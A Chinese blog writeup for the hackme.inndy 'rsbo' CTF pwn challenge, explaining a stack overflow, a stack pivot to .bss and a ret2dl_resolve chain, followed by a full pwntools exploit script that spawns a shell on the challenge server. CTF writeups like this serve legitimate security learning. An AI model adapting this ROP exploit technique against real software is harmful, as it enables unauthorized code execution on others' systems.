hackme inndy pwn rsbo writeup

最新推荐文章于 2023-09-19 16:22:36 发布
最新推荐文章于 2023-09-19 16:22:36 发布
阅读量652 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/78947199
版权

因为rsbo和rsbo2是同一题,所以就直接做rsbo2了

首先看看程序
这里写图片描述

init函数那里用时间和flag生成了一个seed,所以不能预测rand产生的值
然后是读了0x80个byte,这里有一个栈溢出

但是接下来那个for循环就有点棘手了,想了半天想不到,就去看了下别人的wp,发现是送了104个字节的\x00,这里这样做的原因是当修改到v8的值的时候,可以修改为0,这样就跳出for循环了,不会影响后面的rop

有栈溢出了,但是还是有点麻烦,因为只有20个字节留下来可以rop,这样很明显就不能写很长的payload,于是根据提示,把栈转移一下,用16个字节就可以完成栈转移加读取新的rop链

然后在新的rop链处直接return to dl_resolve就可以get到shell了

具体的利用代码如下

from pwn import *
import roputils as rp
import time

#p=process('./rsbo')
p=remote('hackme.inndy.tw',7706)
e=ELF('./rsbo')
context.log_level='debug'

bss=e.bss()+0x800
rop=rp.ROP('./rsbo')
p4ret=0x804879C
pebp=0x804879F

payload='\x00'*108+p32(0x804865C)+p32(pebp)+p32(bss)+p32(0x8048733)  #stack_pivot
p.send(payload)

time.sleep(1)


rop_data='a'*4+rop.call('read',0,bss+180,0x80)+rop.dl_resolve_call(bss+200,bss+180)
rop_data += rop.fill(0x7f,rop_data)
p.sendline(rop_data)

time.sleep(1)
bss_data='/bin/sh\x00'
bss_data += rop.fill(20,bss_data)
bss_data += rop.dl_resolve_data(bss+200,'system')
bss_data += rop.fill(0x80,bss_data)
p.send(bss_data)
p.interactive()
charlie_heng
关注
专栏目录
pwn栈溢出10道练习题有writeup
01-04
在这个场景中,"pwn栈溢出10道练习题有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 6757
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
hackme-1靶机渗透详解
大熊
06-12 599
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。 此靶机重点在于SQL注入,爆出管理员用户及密码。
HACK ME靶机
qq_49101841的博客
10-01 1211
❀本篇关于信息安全实训时靶场训练的操作笔记。
HACKME: 1实战演练
龙狼刺的博客
05-24 182
HACKME: 1
攻防世界-hackme
qq_70851535的博客
11-19 343
逆向分析
2020 蓝帽杯线下赛PWN WriteUp .pdf
09-05
本文主要涉及的是网络安全领域的Pwn(利用漏洞攻防)技术,具体是针对2020年蓝帽杯线下赛中的一个Pwn题目进行的WriteUp(解题报告)。Pwn类题目通常涉及到缓冲区溢出、格式字符串漏洞、整数溢出等,目标是通过编写...
2023 强网杯 Writeup
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
2024NKCTF-pwn
最新发布
03-25
2024NKCTF_pwn
hackme.inndy.tw的rop题目
10-15
hackme.inndy.tw的rop题目,如果那个网站被墙或者关闭的话可以从这里下载
hackme 靶场复现
m0_68471358的博客
08-02 316
靶机下载地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/将靶机下载并导入到VMware虚拟机当中,开启hackme1靶场,并开启kali当作攻击机将两台虚拟机均设为桥接模式二.靶机渗透。
Hackme靶机渗透
m0_50584370的博客
06-01 272
hackme靶机渗透
【靶机渗透】HACKME: 1
安全狐
07-19 989
【靶机渗透】HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初学者,简单 2. 描述 'hackme' is a beginner difficulty level box. The goal is to gain limite
Hackme_1靶机渗透 (新手推荐)主要考点SQL注入,文件上传
m0_64429364的博客
09-19 327
hackme_1详细解释
Hackme-Crypto-wp
qq_41509200的博客
09-13 595
Hackme-Crypto-wp 背景: 这几天老师要求我们把hackme的题目做出来,于是便开始了新的征程,一定把全部flag找出来,fighting… 题目及解题思路 1、easy 526b78425233745561476c7a49476c7a4947566863336b7349484a705a3268305033303d 利用经验觉得像16进制转字符串,于是找个在线网站试试 还真有点...
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 4121
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
[攻防世界]hackme
逆向萌新的博客
06-23 279
[攻防世界]hackme
hackme(web wp)
Xi4or0uji
09-06 4345
oj说了不要直接给flag,所以就只写思路啦~ hide and seek 源码就有了 Guestbook 这题是SQL注入 看数据库 ?mod=read&id=-1 union select 1,2,database(),4# 然后就看到数据库是g8 表 ?mod=read&id=-1 union select 1,2,(select table_name fr...
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值